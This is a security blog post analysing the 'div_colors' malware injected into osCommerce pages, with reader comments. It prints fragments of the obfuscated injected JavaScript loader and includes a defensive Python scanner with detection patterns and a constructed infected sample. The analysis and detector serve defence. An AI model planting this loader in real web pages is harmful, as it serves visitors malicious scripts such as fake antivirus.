The “div_colors” Malware Update

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and adds the following obfuscated code to the pages:

if (typeof(redef_colors)=="undefined") {
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); ...

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {

As you can see, it looks like valid JavaScript, and that is what is confusing a lot of people. In fact, what it does is load a new (and malicious) script element from an external web site, as you can see here:

var new_cstyle=document.createElement("script");
document.getElementsByTagName("head")[0].appendChild(new_cstyle);

Where is it loading the malicious code from?

Right now, it is loading from, but a few hours ago, it was using a different domain name, and it changes every few hours! The code is also mutating, and every infected site has a backdoor to load the new variation every once in a while.

This is a list of some of the domains used so far:

As you can see by the common domain names, it is trying to push the infamous fake AV.

Here is the frame created by the first intermediary, which is also changing:

<frame src ="" ..
<frame src="

It is a very complex piece of malware, and every osCommerce user needs to make sure their site is secure. The file_manager.php file needs to be removed, and the admin directory renamed and protected. We also recommend our security scanner to verify whether a site is infected. If it is, we can take care of it for you.
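As an added illustration (not code from the post or from Sucuri), the script below shows how a site owner could look for the injection markers quoted above (the div_colors, redef_colors and div_pick_colors names, plus the generic createElement("script") injection pattern) across an osCommerce tree, and then check the two hardening steps recommended here: that admin/file_manager.php is gone and that the admin directory is no longer at its default, unprotected location. The sample site it scans is constructed inline in a temporary directory; the .htaccess check and the default "admin" directory name are assumptions for the example, not something the post specifies.

```python
import os
import re
import tempfile

# Markers of the div_colors injection as quoted in the post, plus one generic
# pattern for scripts that inject another script tag at runtime. The generic
# pattern also matches legitimate code, so treat it as a weak indicator and the
# three named identifiers as the specific ones.
SIGNATURES = {
    "div_colors": re.compile(r"\bdiv_colors\b"),
    "redef_colors": re.compile(r"\bredef_colors\b"),
    "div_pick_colors": re.compile(r"\bdiv_pick_colors\b"),
    "dynamic_script": re.compile(
        r"createElement\s*\(\s*['\"]script['\"]\s*\)", re.IGNORECASE),
}

SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")


def scan_text(text):
    """Return the sorted names of all signatures found in a blob of text."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan_tree(root):
    """Walk root and map each matching file (relative path) to its signatures."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    matched = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if matched:
                hits[os.path.relpath(path, root)] = matched
    return hits


def hardening_findings(root, admin_dir="admin"):
    """Check the hardening steps from the post. The .htaccess test is an assumed
    way of verifying 'protected'; adapt it to however the site restricts admin."""
    findings = []
    admin_path = os.path.join(root, admin_dir)
    if os.path.isdir(admin_path):
        findings.append("admin directory still uses the default name %r" % admin_dir)
        if os.path.isfile(os.path.join(admin_path, "file_manager.php")):
            findings.append("file_manager.php is present in admin; remove it")
        if not os.path.isfile(os.path.join(admin_path, ".htaccess")):
            findings.append("admin directory has no .htaccess; add access protection")
    return findings


# Constructed sample content: a shortened copy of the injection shape quoted
# in the post, appended to an otherwise clean PHP file.
INJECTED_SAMPLE = (
    'if (typeof(redef_colors)=="undefined") {\n'
    "var div_colors = new Array('#4b8272', '#81787f');\n"
    'var redef_colors = 1;\n'
    'function div_pick_colors(t,styled) {\n'
    'var new_cstyle=document.createElement("script");\n'
    'document.getElementsByTagName("head")[0].appendChild(new_cstyle);\n'
    '}}\n'
)
CLEAN_SAMPLE = "<?php echo 'hello'; ?>\n"


def build_sample_site():
    """Create a constructed, unhardened osCommerce-like tree with one infected file."""
    root = tempfile.mkdtemp(prefix="oscommerce_sample_")
    os.makedirs(os.path.join(root, "admin"))
    os.makedirs(os.path.join(root, "includes"))
    with open(os.path.join(root, "admin", "file_manager.php"), "w") as fh:
        fh.write(CLEAN_SAMPLE)
    with open(os.path.join(root, "includes", "header.php"), "w") as fh:
        fh.write(CLEAN_SAMPLE + INJECTED_SAMPLE)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(CLEAN_SAMPLE)
    return root


def run_demo():
    """Scan the constructed site and return (infected files, hardening findings)."""
    root = build_sample_site()
    return scan_tree(root), hardening_findings(root)


if __name__ == "__main__":
    hits, findings = run_demo()
    for path, names in hits.items():
        print("INFECTED %s: %s" % (path, ", ".join(names)))
    for finding in findings:
        print("HARDENING: %s" % finding)
```

Run it against the real document root instead of the constructed tree by calling scan_tree and hardening_findings with that path; a hit on the specific identifiers is a strong sign the page has been modified, while a hit on dynamic_script alone only tells you a script injects another script and deserves a manual look.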

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • jeremy

    I got infected… I was able to fix the pages with SED. Does anyone know where these ‘backdoors’ are?? I want to make sure this doesn’t happen again.

    • Jonathan

Hi Jeremy. My site got infected also… Have you found what caused it?

  • David Psd Xhtml

Thousands of sites with this malware… webmasters' headache

  • Ehaba

I wrote a small program that deletes the malware code from all JS scripts. The PHP script also deletes one more type of malware and sets a read-only mask for each file on the server with the needed extension.
    Link for download
